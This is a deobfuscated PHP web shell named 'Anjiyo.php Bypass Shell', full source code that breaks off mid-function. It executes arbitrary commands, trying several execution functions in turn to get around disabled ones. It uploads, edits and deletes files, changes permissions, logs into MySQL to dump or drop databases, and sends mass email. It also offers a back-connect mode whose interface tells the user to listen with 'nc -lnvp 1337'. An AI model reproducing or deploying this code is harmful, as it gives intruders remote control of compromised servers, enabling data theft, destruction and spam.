/* Decoded by unphp.net */ set_time_limit(0); error_reporting(0); @session_start(); language('en'); if (isset($_GET['hostm']) &&isset($_GET['userm'])) { $hostm = base64_decode($_GET['hostm']); $userm = base64_decode($_GET['userm']); $passm = base64_decode($_GET['passm']); } function hex2bin($str) { $bin = ''; $i = 0; while ($i 'ON (Güvenli)',1 =>'OFF (Güvenlikler kapalý)',2 =>'Yok',3 =>'Dosya',4 =>'Tipi',5 =>'Dosya boyutu',6 =>'Chmod izinleri',7 =>'Ýþlemler',8 =>'Enlace',9 =>'Crear Carpeta',10 =>'Crear Archivo',11 =>'Klasör',12 =>'Arþiv',13 =>'Sil',14 =>'Descargar',15 =>'Editar',16 =>'No se puede abrir el directorio, lo siento.',17 =>'Onayla',18 =>'Ejecutar!',19 =>'Kullanýcý:',20 =>'Þifre',21 =>'Entrar!',22 =>'List Tablas',23 =>'Borrar',24 =>'Descargar',25 =>'Volver atras',26 =>'Datos',27 =>'Lo siento, no se pueden listar las tablas de la db seleccionada.',28 =>'Entrar!',29 =>'Campo',30 =>'Tipo',31 =>'Nulo',32 =>'Llave',33 =>'Por defecto',34 =>'Extra',35 =>'La tabla seleccionada, no tiene registros.',36 =>'La base de datos fue borrada correctamente.',37 =>'No se pudo borrar la base de datos.',38 =>'Realmente deseas borrar la db',39 =>'Si',40 =>'La tabla fue borrada correctamente.',41 =>'No se pudo borrar la tabla.',42 =>'Realmente deseas borrar la tabla',43 =>'Tu email',44 =>'Lista de emails',45 =>'Titulo',46 =>'Contenido HTML',47 =>'Conectando',48 =>'Si no tienes habilitados los iframes, has clic ',49 =>'aqui',50 =>'Conectar',51 =>'( Debes ejecutar en tu pc: nc -lnvp 1337, y tener el puerto abierto :) )',52 =>'Server ip',53 =>'Kendi ipin',54 =>'SI',55 =>'NO',56 =>'Disable Functions',57 =>'Iniciox',58 =>'Codigo PHP',59 =>'Conexion Reversa',60 =>'Dosyayý düzenleyebilirsiniz',61 =>'Archivo Guardado Correctamente!',62 =>'Lo siento, no se ha podido guardar el archivo.',63 =>'Php kodunu enjekte et',64 =>'Error subiendo archivo',65 =>'No se puede copiar ',66 =>'al dir',67 =>'Archivo Subido correctamente',68 =>'Carpeta Borrada',69 =>'Archivo Borrado',70 =>'Carpeta Creada',71 =>'Nombre de la carpeta',72 =>'Crear DIR!',73 =>'Archivo Creado',74 =>'Nombre del archivo',75 =>'Crear Archivo!',76 =>'Lo siento, no se puede descargar el archivo',77 =>'Volver Atras',78 =>'Logueado correctamente',79 =>'Listar DBS',80 =>'Salir',81 =>'Login Incorrecto.',82 =>'Spammeado correctamente',83 =>'No fue spammeado',84 =>'Subir Archivos',85 =>'Utilidades',86 =>'Estas seguro que deseas borrar los siguientes archivos/carpetas?',87 =>'Estas seguro que deseas borrar el siguiente archivo:',88 =>'Estas seguro que deseas borrar la siguiente carpeta:',89 =>'Lo siento, no se pueden leer los permisos',90 =>'CHMOD Cambiado',91 =>'Error al cambiar el CHMOD',92 =>'Caracter Inválido',93 =>'Yeni permisyon',94 =>'Nuevos permisos',95 =>'Üzgünüm seçtiðin dosya deðil',96 =>'Hatalý link'); } else { $lenguaje = array(0 =>'ON (Secure)',1 =>'OFF (Not Secure)',2 =>'Havent',3 =>'Name',4 =>'Type',5 =>'Size',6 =>'Perms',7 =>'Options',8 =>'Link',9 =>'Make folder',10 =>'Make file',11 =>'Folder',12 =>'File',13 =>'Delete',14 =>'Download',15 =>'Edit',16 =>'Unable to open the directory, sorry.',17 =>'Send',18 =>'RUN!',19 =>'User:',20 =>'Password:',21 =>'Login!',22 =>'List Tables',23 =>'Deñete',24 =>'Download',25 =>'Go back',26 =>'Data',27 =>'Lo siento, no se pueden listar las tablas de la db seleccionada.',28 =>'Login!',29 =>'Campo',30 =>'Type',31 =>'Null',32 =>'Key',33 =>'Default',34 =>'Extra',35 =>'The selected table has no records.',36 =>'The database was deleted successfully.',37 =>'Could not delete the database.',38 =>'I really want to delete the database',39 =>'Yes',40 =>'The table was deleted successfully.',41 =>'Could not delete the table.',42 =>'I really want to clear the table',43 =>'Your email',44 =>'MailList',45 =>'Title',46 =>'Content HTML',47 =>'Connecting',48 =>'If you do not have iframes enabled, you click',49 =>'HERE',50 =>'Connect',51 =>'( You run on your pc: nc -lnvp 1337, and have the port open :) )',52 =>'IP of server',53 =>'Your IP',54 =>'ON',55 =>'OFF',56 =>'Disabled Functions',57 =>'Index',58 =>'PHP RUN',59 =>'BackConnect',60 =>'If the type of function used to visualize the file does not work, you try to open the file with',61 =>'File saved successfully!',62 =>'Sorry, could not save the file.',63 =>'Running PHP code (not write the php tags!)',64 =>'Error uploading file',65 =>'Cant copy',66 =>'in the directory',67 =>'File saved successfully',68 =>'Folder deleted',69 =>'File Deleted',70 =>'Folder Maked',71 =>'Name folder',72 =>'Make Dir!',73 =>'File created',74 =>'Name file',75 =>'Make File!',76 =>'Sorry, you cant download the file',77 =>'Go back',78 =>'Logged correctly',79 =>'List databases',80 =>'Exit',81 =>'Login Incorrect.',82 =>'Spammed correctly',83 =>'Was not spammed',84 =>'Upload Files',85 =>'Utilities',86 =>'Are you sure you want to delete the following files / folders ?',87 =>'Are you sure you want to delete the following file:',88 =>'Are you sure you want to delete the following folder:',89 =>'Sorry, can not be read permissions',90 =>'CHMOD changed',91 =>'Failed to change the CHMOD',92 =>'Invalid Character',93 =>'Current Permits',94 =>'New Permits',95 =>'I\'m sorry, you did not select files',96 =>'Invalid link'); } } function css() { echo ' '; } function header_index() { global $lenguaje; echo ''.$_SERVER['HTTP_HOST'].' - Anjiyo.php Bypass Shell v 1 // Coded by MecTruy


System: '.php_uname().'
Soft: '.$_SERVER['SERVER_SOFTWARE'].' | PHPINFO
Safe-Mode: '; if (strtolower(ini_get('safe_mode')) or ini_get('safe_mode') == 'on') { echo ''.$lenguaje[0].''; } else { echo ''.$lenguaje[1].''; } echo '
Open base dir: '; if (strtolower(ini_get('open_basedir')) or ini_get('open_basedir') == 'on') { echo ''.ini_get('open_basedir').''; } else { echo ''.$lenguaje[1].''; } echo '
'; exp_dirs(); echo '

'; } function ver_tam($tam) { if (!is_numeric($tam)) { return FALSE; } else { if ($tam >= 1073741824) { $tam = round($tam/1073741824*100)/100 .' GB'; } elseif ($tam >= 1048576) { $tam = round($tam/1048576*100)/100 .' MB'; } elseif ($tam >= 1024) { $tam = round($tam/1024*100)/100 .' KB'; } else { $tam = $tam .' B'; } return $tam; } } function disable_functions() { global $lenguaje; if ($disablefunc=ini_get('disable_functions')) { return ''.$disablefunc.''; } else { return ''.$lenguaje[2].''; } } function buffer_exec($buffer) { global $Sonuç; $Sonuç = htmlspecialchars(ob_get_contents()); } function exp_dirs() { global $dir; if (trim($dir)=='') { $dir = @getcwd(); } elseif(!trim($dir)=='') { $dir = @realpath($dir); } if (substr($dir,-1) != DIRECTORY_SEPARATOR) { $dir .= DIRECTORY_SEPARATOR; } $pd = $e = explode(DIRECTORY_SEPARATOR,substr($dir,0,-1)); $i = 0; echo 'Dir: '; foreach($pd as $b) { $t = ''; $j = 0; foreach ($e as $r) { $t.= $r.DIRECTORY_SEPARATOR; if ($j == $i) { break; } $j++; } echo ''.htmlspecialchars($b).DIRECTORY_SEPARATOR.''; $i++; } } function ver_permisos($modo) { if (($modo &0xC000) === 0xC000) { $tipo = 's'; } elseif (($modo &0x4000) === 0x4000) { $tipo = 'd'; } elseif (($modo &0xA000) === 0xA000) { $tipo = 'l'; } elseif (($modo &0x8000) === 0x8000) { $tipo = '-'; } elseif (($modo &0x6000) === 0x6000) { $tipo = 'b'; } elseif (($modo &0x2000) === 0x2000) { $tipo = 'c'; } elseif (($modo &0x1000) === 0x1000) { $tipo = 'p'; } else {$tipo = '?';} $prop['read'] = ($modo &00400)?'r':'-'; $prop['write'] = ($modo &00200)?'w':'-'; $prop['execute'] = ($modo &00100)?'x':'-'; $group['read'] = ($modo &00040)?'r':'-'; $group['write'] = ($modo &00020)?'w':'-'; $group['execute'] = ($modo &00010)?'x':'-'; $world['read'] = ($modo &00004)?'r':'-'; $world['write'] = ($modo &00002)?'w':'-'; $world['execute'] = ($modo &00001)?'x':'-'; return $tipo.join($prop).join($group).join($world); } function ver_permisos_color($file_color) { global $dir; if (!is_readable($file_color)) { return ''.ver_permisos(fileperms($file_color)).''; } elseif (!is_writable($file_color)) { return ''.ver_permisos(fileperms($file_color)).''; } else { return ''.ver_permisos(fileperms($file_color)).''; } } function listar_archivos($dir) { global $lenguaje; if ($dh=@dir($dir)) { while ($file = $dh->read()) { if (($file=='.') or ($file=='..')) { $links_ls[]=$file; } elseif (is_dir($dir.'/'.$file)) { $dirs_ls[]=$file; } else { $archivos_ls[]=$file; } } echo '
'; $color=0; if(isset($links_ls)) { foreach ($links_ls as $links) { if ($links=='..') { echo ''; } elseif ($links=='.') { echo ''; } } } if(isset($dirs_ls)) { asort($dirs_ls); foreach ($dirs_ls as $dirs) { echo ''; } } if(isset($archivos_ls)) { asort($archivos_ls); foreach ($archivos_ls as $archivo) { echo ''; } } echo '
- '.$lenguaje[3].' '.$lenguaje[4].' '.$lenguaje[5].' '.$lenguaje[6].' '.$lenguaje[7].' OP
'.$links.' '.$lenguaje[8].' --- '.ver_permisos_color(realpath($dir.'/..')).' --- --
'.$links.' '.$lenguaje[8].' --- '.ver_permisos_color(realpath($dir.'/.')).' --
'.$dirs.' '.$lenguaje[11].' --- '.ver_permisos_color(realpath($dir.'/'.$dirs)).'
'.$archivo.' '.$lenguaje[12].' '.ver_tam(filesize(realpath($dir.'/'.$archivo))).' '.ver_permisos_color(realpath($dir.'/'.$archivo)).'
'; echo '

'; } else { echo $lenguaje[16]; } } function mostrar_iconos($icono) { if ($icono=='carpeta') { $mostrar_icono='R0lGODlhEAAQAPcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmcwzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZzJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAGb//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZmM2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmTPMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMAzDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAABm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAMwAAAP//lP//nP//9//3jP/3nP/3pf/vhP/ne//nhL2eMbWOGN62Of/fe5x5GN62Qt62Sv/Xa6V5EOe+UvfXhP/PYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIhgCvCRxIsKDBgwbDKQyHcGA4ABC1MUT4MJvFbADEadSYziG3bSBBQhzZUWA4b+A2qlx5LRw5cQC0yZQ5cp02ceXCoRN3MVu3nuyy4QzHjie2o0ixbVMnNGfRbOCiSgXn7Vy3oU+/ad36jZy5pkR5ohtLduw4bjivrVy7sZzAcnDjyo3bEGFAADs='; } elseif ($icono=='link') { $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAACOklEQVQ4y8VTS2gTYRCe+XezzbbNsylNmqDFxkZjoF6Mj0SQGhNQUIqgHuoDDxU8exBFBKleRL1IwYMXUUEPHooUBKNSFJvQUqvGEIU0jzZ1NzHpI41Juru/hxqMxZMVnOPMfN83zMyHlFJYS5A1of8FAbs6IUkSpFMpXTyZMkuyrDIZDfkue6eo0eqk+r7PsZieMIz8G4EgCPzd+499b2KCr8oZ2pBRMVBeKJrVlcjRgGd4n68nynEc/RSNtp2/fO3EyWO9w1hb4mwm03jp+uCpJNr8equdJYQoP2tYXlrEpdT7vH9LyyN3t/PDnSev+tPz0sZzh7dfQUopLC9XYeDG4JHXQkOfulmPUrmosLyW8FoDEEQKAJQCkELi4/eyODXX4tpjKYmJ4tm9nQMsAEAoPNbxMpI50MTzM25LNbh+k1mMxdMd775EPWy7q53X6AEpVQwdLjVd57QwrIqWBAoAiKyiyPD0+YiXrSzMXTxz6JZn184EEgKyLI2Mj0+8uP1gqO9btWtHk9FMEACQEAp1v0NEMdsYDo1uON3b89Dr9SSQrFyWYVhwu7dNH9zdPVSYmlz847shAJtMJltNzQ2Z/QHfxOr629GQ7d6zseOtTo+OEPJLmBAAXBFis9msOhDwTxqNxmo9OBwKmS9cvdmvWLY6+MLXaiU/W1NFRAbKhYyEaKcYDAYtVqu15HA45usJIpGIKTU9Y2NVHK2dE2tzAwAiVVzOzXHM5XKMRqNROI77K1fhf3fjD83C6LLhE0Y7AAAAInpUWHRTb2Z0d2FyZQAAeNorLy/Xy8zLLk5OLEjVyy9KBwA22AZYEFPKXAAAAABJRU5ErkJggg=='; } elseif ($icono=='archivo') { $mostrar_icono='R0lGODlhEAAQAPcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmcwzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZzJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAGb//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZmM2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmTPMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMAzDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAABm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAMwAAAFJRUgAAnACGAJyenISGhM7Pzufn1v/PMYQAAAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIfACvcRtIsOC2awgRcvPGsGHDbdgSCgRAsWLFbQAiKrTIESI2jdwAFBwZrhtIkdm+ZVvJMlzGjdxYyszm8mRIjgC81YQJoAA4itJy7pwYEtwIANJoSdP5kijFnwC0aWNq06HDoSHDad3KtelNnBZBdhtLtuxYjR/Tql17LSAAOw=='; } elseif ($icono=='borrar') { $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAXUlEQVR42u2SwQoAIAhD88vVLy8KBlaS0i1oJwP3piGVg0Skmpq8HjqZrWl9uwCbGAmwKYGZs/6iqgMyAdJuM8W2QmYKpLt/0AG9ASCv/oAnANd3AEjmAlFT1BypAV+PnRH5YehvAAAAAElFTkSuQmCC'; } elseif ($icono=='editar') { $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAAsSAAALEgHS3X78AAAAB3RJTUUH1gkCDTgyeDqBQAAAAB10RVh0Q29tbWVudABDcmVhdGVkIHdpdGggVGhlIEdJTVDvZCVuAAABp0lEQVQ4y42RvUtbURjGfzfECI0U6eIQFNLFrRCHLkIrWAX/gYLk+oWDQ7OUQkgQ2qEEw8X+AaUgxNh2KIpLQLSCBEHQ4pAttEvNFM29mXJRDpy3Q416c68fD5zhvIf39z7vcwyuNZy3cvvcr7FMevGnr5q3cqK19h2llCilxHVdUUpJ3spJ3sq9aveFOkGO42DbNnbDptFo4DQdfh0dsbVdon5a593bNMBOG+IDiAgigkbQIogW4k/jNJtNoo+i1E/rmMkZgB2AsA+ghZXCF09t2pyjJ/qYjc0fuK5Lq9W6evMBtGhmpuYBgUsXWjSJxBAnJ3+JRCL0fH4JwLiJGQ5aoVBcufULxiuLDGag+/cLKuvlYiBgKjmLICD/722dZfuvmi8Oy9ySgab4rXDn5IvDMtUaAO8DMhCSk9OeWufkag3+9I3y+tPux3DQnl+/r3qn420eWFhl+6AG7BqBgJsOzrL9DK3BG3XOfBf0pko8eT4BB0vBGXQ6yKzBsQm9qQ90xZ55wgbkXgedebRlGEawg1gsxkOktfYB9qzlpREeqFAotAfwD53h3AFtQ/QoAAAAAElFTkSuQmCC'; } elseif ($icono=='descargar') { $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAANkE3LLaAgAAAoFJREFUeJx1kstL1FEYhp9zzsw45VxSs5Fuk8NITldqMCWKIDCQiogW0UKoDCKCWrUOoj+gVYsocNGiRWBEi6A2CQXahJV2WdSgdNGiJh3NnzO/c2mhjZL2rc7ifR/e872fYIlJH01f3X9sf6ee0VMCgQqryOO7j2/l7+Wv/KsNLAVINTZmujpOrdeeDwJUOMhwLt+UJ79IuyRg2vzSH6cGMZ7BAQGtmBbjZimtWvCWbeeyNzP70scbdsR2xxpCcc+N4zHOpCkw7Sbiq1NrW+q31x38nBt9ALhFCULN5fa9h7PrjO9RcB8IBiUAvnaksisbk7tk45MHuZG/5kWATi8z3P+qt97f4sLxQIyIWIF1mh+M8b00SmSw2jtd3vPpGe8Xf+FEe/Ptg61Nh6rfI/WMJyKp1axZniYarAXrk+iTtLxLy6aGug2ZVCL1qO9DTwVw+dKZqx3ZVR0DAy9qvn7+JnhTxo0Itmw+QKxUz5cbz7G9RX4WCvLr6BfasptSieTWxNP+1w8DAL8nJ5sS1SI1EqlhWbQWJSR+0THWk8M5qJuKUJWO4pxFOkNUlKLC2UxlB8boeFAb9rVuxvkeQkhAYLSPEALZkATncA4sIEtFgk7GKgCrjRZYVm5s5VH3NRz2n7YFAF7ZcqTrIt9z95kpq1IF4CQ+QoKqAhViZ3brAnOlMQZeDEEoPJfEzgOEFT5qtnNjDK8GhnAVo6gAjJk9RhkIYayeBxhEGTl7EkoptjUnsdYgpcLaOZNSvHw7AoDWGmdZkEBILQWApf3kBf437S0OEKhQECtMqZIvHCZ59vjh60gZcDgnhQQxF93N78ACdfFIdaFQLHbfuX9+osTwHy4bB5h5T+YrAAAAAElFTkSuQmCC'; } elseif ($icono=='agregar_archivo') { $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAWdJREFUeNqkUz1rg1AUvUr3jIEKmkxdav6Bq4hDELpkz/7GLP4Dx/wJs9ShlKBZ8xe6dMpWUggkEMSE+NF3hGfV2rS0Fy7vvofn3HOu70lFUdB/4qbr0PO8a6wPs9ks+JZAgC3LotFo1EX+yBdJ7OU2GEARSZJQHMd0PB7pcDh0ypHbYN71WZxlWdZIxGQywTLnOUQhYYhtz4qivOu63tc0jfI8L8FYF4sFLZdLMgzjzXVdBQ2rGdSl8+gPBgNK07RSAgKA7+b3tGbrW5yHYfhJgIHBKz5EXi6XCuj7PkVR1PDOGxZQ0vgLAlCXjQQYnUWIGko6CergXq9HpmnSiq0q8Ct7KWsokNsE8C2mjnq/39N0OqUgCBoWuH8Jg2wQtMFYz+czbbdbOp1OZNt22R2dxeB/tCByt9sRY4wcxyFVVXEbh1zF5qoFkSCAAgTuAg/Gc/PlLeDf//U1jvltfPolZlzffAgwAMubE3kVfrHwAAAAAElFTkSuQmCC'; } elseif ($icono=='agregar_carpeta') { $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAqZJREFUeNqMUltIFFEY/v45Z3bd1Wy9BaVpKlkSaiRivXaxoCBCEuwhgqDsISoxkCAIeiojeiixXoTowbLLQ9CD9GohorimSGKTLqWZYnnZNfcyp//MeCMK+pl/Zs5/vv/+UX/LgR92PBpQdgJayBAgIb8SGYf55NUmrAg5jwRR14pZaueyulYgFndBQqD3/qlsDjJAtOa7GoMTGNKcIkNucgIo22bnJUSHm6AUwcyuxp66J4BBq1ndl3I/0kSw+XSWMEUFV9ItHZAK84WP7wXik29WwboC4kDk/GugDaPwCl8rDIVmo8V5Ae5HIxMRLovbJbHWMn8MYeBz90fMhCb4qJwARLWMlSja7O3jub1yA+AXhEcHkE4qt2qC1TWIlIAXhce5JXt5RiutmB4EW86ekE5tIorRnmFMW1/Wjwt55duRnpOBmHUPpNSyVcHw5SAqdmA2Eu+SZBhYmrAQXZhHRX0bZ+J1KnLaSYSauV0DkjE8dd2TG3tDMSKDgxifirVJ3jfmJsaQmrMTiFiwpzt0DicXiSQI7Sh8aB14ivZPvU717IIqbx4uNY09FheOFdyAiiOzqASml1eKRR5FEquHh+UBPH52fob3P3uwvxw4s68BKWnvMBSZxbYj8Bt6TfPfJuHP38rgJVBKgHWjo0jWmobnI90ozQfCvO3SjCaEI8CuXIbbuChtRXO8ltTgwwfQpFJr7GFWEHzwaoqgMvsqKrbcduyXKxV6xhvR2XfLQZZdqy3eHYsnEupP3tqwF8L24veakZd7C3jZMeD6QYWbbwl+E+i3mH8fHlUFS851jLgL/qvYRw+h3RrHydxMoHO0kfkP8BmLM3hBHAD/El4e/MqD/POvc6vv4G5yOqo1HTR1tHN7A+oJ/y88NmStO0+xhn4LMACJMOOyazadagAAAABJRU5ErkJggg=='; } if ($mostrar_icono) { header('Content-type: image/gif'); echo base64_decode($mostrar_icono); } else { echo 'kkr'; } } function upload_file($dir) { global $lenguaje; echo '




'; if (is_writable($dir)) { echo 'Yüklenebilir -> ('.ver_permisos(fileperms($dir)).')'; } else { echo 'Yüklenemez -> ('.ver_permisos(fileperms($dir)).')'; } echo '
'; } function f0rm_exec($dir) { global $lenguaje; echo '


'; echo '
'; } function is_disabled($funcion) { $funciones_deshabilitadas=explode(',',ini_get('disable_functions')); return in_array($funcion,$funciones_deshabilitadas); } function c0d3_ex3c($cmd,$dir) { global $Sonuç; @chdir($dir); if (is_callable('exec') &&!is_disabled('exec')) { ob_start('buffer_exec'); exec($cmd,$Sonuçado); echo join(" ",$Sonuçado); ob_end_flush(); } elseif (is_callable('system') &&!is_disabled('system')) { ob_start('buffer_exec'); system($cmd); ob_end_flush(); } elseif (is_callable('passthru') &&!is_disabled('passthru')) { ob_start('buffer_exec'); passthru($cmd); ob_end_flush(); } elseif (is_callable('shell_exec') &&!is_disabled('shell_exec')) { ob_start('buffer_exec'); echo shell_exec($cmd); ob_end_flush(); } return $Sonuç; } function rm_dir_pwn($px) { $h = @opendir($px); while (($item_pwn = @readdir($h)) !== FALSE) { if (($item_pwn!= '.') and ($item_pwn != '..')) { if (!is_dir($px.$item_pwn)) { @unlink($px.$item_pwn); } else { rm_dir_pwn($px.$item_pwn.DIRECTORY_SEPARATOR); @rmdir($px.$item_pwn); } } } @closedir($h); @rmdir($px); return !is_dir($px); } function rm_items_pwn($o) { $is_dir_x = is_dir($o); $o = str_replace("\",DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return rm_dir_pwn($o); } elseif (is_file($o)) { return @unlink($o); } else { if ($is_dir_x) { $sa_dir=is_dir($o); rm_dir_pwn($o); if (!$sa_dir) { return TRUE; } else { return FALSE; } } } } function login_form_mysql() { global $lenguaje; echo '
Host:
'.$lenguaje[19].'
'.$lenguaje[20].'


'; } function post_form_mysql($host,$user,$pass) { global $conexion; $conexion=@mysql_pconnect($host,$user,$pass); if ($conexion) { return true; } else { return false; } } function listar_dbs() { global $conexion,$dir,$lenguaje; echo '

'.$lenguaje[25].'

'; $mysql_list_db = @mysql_list_dbs($conexion); $num = @mysql_num_rows($mysql_list_db); for($i=0;$i<$num;$i++) { $dbname = @mysql_dbname($mysql_list_db,$i); echo ''; } echo '
'.htmlspecialchars($dbname).' '.$lenguaje[22].' '.$lenguaje[23].' '.$lenguaje[24].'
'; } function listar_tbs($db) { global $conexion,$lenguaje; $list_tables=@mysql_list_tables($db); $num=@mysql_num_rows($list_tables); if ($num) { echo '
'.htmlspecialchars($db).' - '.$lenguaje[25].'

'; for($i=0;$i<$num;$i++) { $nombre_tabla=@mysql_tablename($list_tables,$i); echo ''; } echo '
'.htmlspecialchars($nombre_tabla).' Schema '.$lenguaje[26].' '.$lenguaje[23].' '.$lenguaje[24].'
'; } else { echo $lenguaje[27].'

'.$lenguaje[25].''; } } function ver_schema($nombre_tabla,$dbname) { global $conexion,$lenguaje; $query_show_fields = @mysql_db_query($dbname,"SHOW fields FROM $nombre_tabla"); $num = @mysql_num_rows($query_show_fields); echo '
'; echo $nombre_tabla.' - '.$lenguaje[25].'

'; for( $i = 0;$i <$num;$i++) { $field=@mysql_fetch_array($query_show_fields); echo ''; } echo '
'.$lenguaje[29].' '.$lenguaje[30].' '.$lenguaje[31].' '.$lenguaje[32].' '.$lenguaje[33].' '.$lenguaje[34].'
 '.$field['Field'].'  '.$field['Type'].'  '.$field['Null'].'  '.$field['Key'].'  '.$field['Default'].'  '.$field['Extra'].'
'; echo '
'; } function paginar($table,$db) { global $conexion; @mysql_select_db($db); $sergio=@mysql_query("SELECT * FROM $table"); $total_paginas=mysql_num_rows($sergio) / 30; for ($pag=0;$pag <$total_paginas;$pag++) { $paginas[]=''.$pag.''; } echo '
'; echo ''; $paginas_z=implode(' ',$paginas); if ($paginas_z) { echo $paginas_z; } else { echo 'Err0r'; } echo '
'; } function mostrar_datos($tablename,$db,$inicio_limit,$fin_limit) { global $conexion,$total_paginas,$lenguaje; @mysql_select_db($db); if ($total_paginas=='1') { $query_pwn="SELECT * FROM $tablename"; } else { $query_pwn="SELECT * FROM $tablename LIMIT $inicio_limit,$fin_limit"; } $query_columnas=@mysql_query("SHOW COLUMNS FROM $tablename"); $query_datos=@mysql_query($query_pwn); $control_datos=@mysql_fetch_row($query_datos); if ($control_datos) { @mysql_free_Sonuç($query_datos); $query_datos=@mysql_query($query_pwn); echo '
'; echo ''; echo ''; while ($columna=@mysql_fetch_row($query_columnas)) { echo ''; $columnas_matriz[]=$columna[0]; flush(); ob_flush(); } echo ''; while ($datos=@mysql_fetch_row($query_datos)) { echo ''; for($i=0;$i  '.htmlspecialchars($datos[$i]).''; } flush(); ob_flush(); echo ''; } echo '
'.$columna[0].'
'; echo '
'; } else { echo $lenguaje[35]; } } function dump3r($user,$password,$host,$db,$tablename='') { if (!$tablename == '') { $filename = $tablename; } else { $filename = $db; } header("Content-disposition: filename=$filename.sql"); header('Content-type: application/octetstream'); header('Pragma: no-cache'); header('Expires: 0'); $query_dump = mysql_query('show variables'); while(1) { $array_r0w = mysql_fetch_row($query_dump); if ($array_r0w == false) break; if ($array_r0w[0] == 'basedir') $bindir = $array_r0w[1].'bin/'; } echo base64_decode('LS0gRHVtcDNkIGJ5IFBpcnVsaW4uUEhQIFdlYnNoM2xsIHYxLjAgYzBkZWQgYnkgcjBkcjEgOkw='); echo ' '; passthru($bindir."mysqldump --host=$host --user=$user --password=$password $db $tablename"); } function drop_db($dbname) { global $conexion,$lenguaje; if (isset($_POST['ok'])) { if (mysql_query("DROP DATABASE $dbname",$conexion)) { echo ''.$lenguaje[36].'

'; listar_dbs(); } else { echo ''.$lenguaje[36].'

'; listar_dbs(); } } else { echo '
'.$lenguaje[38].' '.htmlspecialchars($dbname).' ?

'; } } function drop_tb($tbname,$dbname) { global $conexion,$lenguaje; if (isset($_POST['ok'])) { @mysql_select_db($dbname); if (mysql_query("DROP TABLE $tbname",$conexion)) { echo ''.$lenguaje[40].'

'; listar_tbs($_GET['dbname']); } else { echo ''.$lenguaje[41].'

'; listar_tbs($_GET['dbname']); } } else { echo '
'.$lenguaje[42].' '.htmlspecialchars($tbname).' ?

